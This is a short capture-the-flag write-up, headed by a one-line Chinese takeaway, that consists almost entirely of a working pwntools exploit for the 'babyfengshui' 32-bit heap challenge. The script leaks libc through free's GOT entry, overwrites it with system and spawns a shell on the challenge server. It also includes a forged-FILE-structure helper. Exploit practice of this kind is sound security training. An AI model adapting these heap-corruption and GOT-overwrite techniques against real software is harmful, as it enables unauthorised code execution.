收获:篡改中间name数组的地址来泄露和攻击
from pwn import * context.log_level = 'debug' # context.arch = 'amd64' libc = ELF('./libc-2.23.so') file = './babyfengshui_33c3_2016' elf = ELF(file) shellcode = asm(shellcraft.sh()) local = 0 if local: io = process(file) else: io = remote('node4.buuoj.cn',28340) def debug(): gdb.attach(io) def pack_file(_flags = 0, _IO_read_ptr = 0, _IO_read_end = 0, _IO_read_base = 0, _IO_write_base = 0, _IO_write_ptr = 0, _IO_write_end = 0, _IO_buf_base = 0, _IO_buf_end = 0, _IO_save_base = 0, _IO_backup_base = 0, _IO_save_end = 0, _IO_marker = 0, _IO_chain = 0, _fileno = 0, _lock = 0, _wide_data = 0, _mode = 0): file_struct = p32(_flags) + \ p32(0) + \ p64(_IO_read_ptr) + \ p64(_IO_read_end) + \ p64(_IO_read_base) + \ p64(_IO_write_base) + \ p64(_IO_write_ptr) + \ p64(_IO_write_end) + \ p64(_IO_buf_base) + \ p64(_IO_buf_end) + \ p64(_IO_save_base) + \ p64(_IO_backup_base) + \ p64(_IO_save_end) + \ p64(_IO_marker) + \ p64(_IO_chain) + \ p32(_fileno) file_struct = file_struct.ljust(0x88, b"\x00") file_struct += p64(_lock) file_struct = file_struct.ljust(0xa0, b"\x00") file_struct += p64(_wide_data) file_struct = file_struct.ljust(0xc0, b'\x00') file_struct += p64(_mode) file_struct = file_struct.ljust(0xd8, b"\x00") return file_struct r = lambda : io.recv() rx = lambda x: io.recv(x) ru = lambda x: io.recvuntil(x) rud = lambda x: io.recvuntil(x, drop=True) s = lambda x: io.send(x) sl = lambda x: io.sendline(x) sa = lambda x, y: io.sendafter(x, y) sla = lambda x, y: io.sendlineafter(x, y) li = lambda name,x : log.info(name+':'+hex(x)) shell = lambda : io.interactive() def add(description_size,name,text_size,text): ru('Action: ') sl('0') ru('size of description: ') sl(str(description_size)) ru('name: ') sl(name) ru('text length: ') sl(str(text_size)) ru('text: ') sl(text) def show(idx): ru('Action: ') sl('2') ru('index: ') sl(str(idx)) def edit(idx,text_size,text): ru('Action: ') sl('3') ru('index: ') sl(str(idx)) ru('text length: ') sl(str(text_size)) ru('text: ') sl(text) def free(idx): ru('Action: ') sl('1') ru('index: ') sl(str(idx)) free_got = elf.got['free'] add(0x80,'aaa',20,'a') #0 add(0x20,'aaa',20,'a') #1 add(0x40,'/bin/sh\x00',20,'/bin/sh\x00') #2 free(0) pay1 = 0x108*b'a' + p32(0x100) + p32(0x29) + p32(0)*9 + p32(0x89) + p32(free_got) add(0x108,'aaa',len(pay1),pay1) #3 show(1) free_addr = u32(ru('\xf7')[-4:]) li('free_addr',free_addr) libcbase = free_addr - libc.sym['free'] li('libcbase',libcbase) system = libcbase + libc.sym['system'] li('system',system) edit(1,len(p32(system)),p32(system)) free(2) shell() #debug()